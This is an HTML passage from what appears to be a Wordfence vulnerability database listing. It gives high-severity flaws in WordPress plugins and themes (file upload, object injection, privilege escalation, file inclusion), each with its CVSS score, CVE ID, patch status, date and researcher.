					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-0551" target="_blank" rel="noopener noreferrer">							CVE-2026-0551						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-protect-page" target="_blank" rel="noopener">PPWP – Password Protect Pages</a> <span class="wfvr-software-slug">[password-protect-page]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/webbernaut" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ef74f4dbe7907a62f177592f647c1afa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ef74f4dbe7907a62f177592f647c1afa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/webbernaut" target="_blank" rel="noopener">Webbernaut</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8f53282-740e-4ac3-a2e1-7a97893e3355" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/add0ef7c-a9a7-4f02-abde-5ca3504b7a19" target="_blank" rel="noopener">Query Wrangler &lt;= 1.5.57 &#8211; Authenticated (Subscriber+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73992" target="_blank" rel="noopener noreferrer">							CVE-2026-73992						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/query-wrangler" target="_blank" rel="noopener">Query Wrangler</a> <span class="wfvr-software-slug">[query-wrangler]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hai-ha" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/250a37192278ceed911abb203c2f7573.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="250a37192278ceed911abb203c2f7573"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hai-ha" target="_blank" rel="noopener">hhhai</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/add0ef7c-a9a7-4f02-abde-5ca3504b7a19" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64f1a71f-e210-4191-bfb4-56f8568180ed" target="_blank" rel="noopener">Security Hardener &lt;= 2.4.4 &#8211; Authenticated (Subscriber+) Privilege Escalation via REST API &#8216;/wp/v2/users&#8217; permission_callback Overwrite</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16149" target="_blank" rel="noopener noreferrer">							CVE-2026-16149						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/security-hardener" target="_blank" rel="noopener">Security Hardener</a> <span class="wfvr-software-slug">[security-hardener]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/64f1a71f-e210-4191-bfb4-56f8568180ed" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5da9901-7bad-4fae-9232-46438ab32ed8" target="_blank" rel="noopener">Smart Cleaning &lt;= 4.8.6 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74016" target="_blank" rel="noopener noreferrer">							CVE-2026-74016						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/smart-cleaning" target="_blank" rel="noopener">Smart Cleaning</a> <span class="wfvr-software-slug">[smart-cleaning]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/34e8630d9d966b9be2ef1801165bedf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="34e8630d9d966b9be2ef1801165bedf1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener">Denver Jackson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b5da9901-7bad-4fae-9232-46438ab32ed8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08b7aa6b-4532-4365-9b73-4453c714be95" target="_blank" rel="noopener">Templatiq &lt;= 0.2.5 &#8211; Authenticated (Contributor+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32474" target="_blank" rel="noopener noreferrer">							CVE-2026-32474						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/templatiq" target="_blank" rel="noopener">Templatiq</a> <span class="wfvr-software-slug">[templatiq]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/08b7aa6b-4532-4365-9b73-4453c714be95" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1981e94e-f565-4e3d-9464-f7f2fc023341" target="_blank" rel="noopener">Warehouse Cargo &lt;= 2.7.0 &#8211; Authenticated (Subscriber+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74018" target="_blank" rel="noopener noreferrer">							CVE-2026-74018						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/warehouse-cargo" target="_blank" rel="noopener">Warehouse Cargo</a> <span class="wfvr-software-slug">[warehouse-cargo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/34e8630d9d966b9be2ef1801165bedf1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="34e8630d9d966b9be2ef1801165bedf1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/denver-jackson-2" target="_blank" rel="noopener">Denver Jackson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1981e94e-f565-4e3d-9464-f7f2fc023341" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e591cb4-058d-4d8e-948e-d65ab01db618" target="_blank" rel="noopener">WPeMatico RSS Feed Fetcher &lt;= 2.8.24 &#8211; Authenticated (Subscriber+) Privilege Escalation via Arbitrary Option Update to wpematico_import_settings admin_action</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19883" target="_blank" rel="noopener noreferrer">							CVE-2026-19883						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpematico" target="_blank" rel="noopener">WPeMatico RSS Feed Fetcher</a> <span class="wfvr-software-slug">[wpematico]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e591cb4-058d-4d8e-948e-d65ab01db618" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c66a75a3-d420-4f2e-9f61-fe7dc2cb759e" target="_blank" rel="noopener">Atarim &lt;= 5.1.1 &#8211; Authenticated (Author+) Arbitrary File Deletion via &#8216;_wp_attached_file&#8217; Meta</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19942" target="_blank" rel="noopener noreferrer">							CVE-2026-19942						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/atarim-visual-collaboration" target="_blank" rel="noopener">Atarim – AI Agency for WordPress: Edit Pages, Fix Code, Update Plugins, SEO &amp; Client Feedback</a> <span class="wfvr-software-slug">[atarim-visual-collaboration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c66a75a3-d420-4f2e-9f61-fe7dc2cb759e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74184cfd-d3ce-4295-8c17-89e521139445" target="_blank" rel="noopener">Flatastic &lt;= 2.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66672" target="_blank" rel="noopener noreferrer">							CVE-2026-66672						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66672" target="_blank" rel="noopener">Flatastic &#8211; Versatile MultiVendor WordPress Theme</a> <span class="wfvr-software-slug">[flatastic]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74184cfd-d3ce-4295-8c17-89e521139445" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21bc466b-dc2e-468d-b793-6659913e4664" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder &lt;= 1.57.0 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66583" target="_blank" rel="noopener noreferrer">							CVE-2026-66583						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/13e4fb57452a5afebd2ab91bf8a0bd52.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="13e4fb57452a5afebd2ab91bf8a0bd52"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener">Ahmed Hassan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21bc466b-dc2e-468d-b793-6659913e4664" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bacf8ad8-4de4-414c-b664-85cdf33074e0" target="_blank" rel="noopener">FreightCo – Free Transportation &amp; Logistics WordPress Theme &lt;= 1.1.15 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66650" target="_blank" rel="noopener noreferrer">							CVE-2026-66650						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/freightco" target="_blank" rel="noopener">FreightCo – Free Transportation &amp; Logistics WordPress Theme</a> <span class="wfvr-software-slug">[freightco]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bacf8ad8-4de4-414c-b664-85cdf33074e0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4033de61-24f7-4c0a-af48-b258e29f9d71" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform &lt;= 1.7.9 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73993" target="_blank" rel="noopener noreferrer">							CVE-2026-73993						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">FundEngine – Donation and Crowdfunding Platform</a> <span class="wfvr-software-slug">[wp-fundraising-donation]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1fcd4731afa8285a12c991cc8c7bdb09.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1fcd4731afa8285a12c991cc8c7bdb09"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/taylsec" target="_blank" rel="noopener">Taylsec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4033de61-24f7-4c0a-af48-b258e29f9d71" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/979bc132-739c-4e4c-a878-1691c762f5ff" target="_blank" rel="noopener">Golo Framework &lt; 1.7.5 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-28150" target="_blank" rel="noopener noreferrer">							CVE-2026-28150						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/golo-framework" target="_blank" rel="noopener">Golo Framework</a> <span class="wfvr-software-slug">[golo-framework]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2778a23819a9ce528ff412cf1f5e72c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2778a23819a9ce528ff412cf1f5e72c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara" target="_blank" rel="noopener">João Pedro S Alcântara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/979bc132-739c-4e4c-a878-1691c762f5ff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46474bf6-0906-4b94-8032-270991c5128d" target="_blank" rel="noopener">Kalles Addons &lt;= 1.0.6 &#8211; Unauthenticated PHP Object Injection</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78572" target="_blank" rel="noopener noreferrer">							CVE-2026-78572						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kalles-addons" target="_blank" rel="noopener">Kalles Addons</a> <span class="wfvr-software-slug">[kalles-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46474bf6-0906-4b94-8032-270991c5128d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a71e330e-8673-49b4-8c31-63771533476f" target="_blank" rel="noopener">Måne &lt;= 1.7 &#8211; Unauthenticated Local File Inclusion</a></h4>
<div class="cvss-score-badge">8.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.1 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
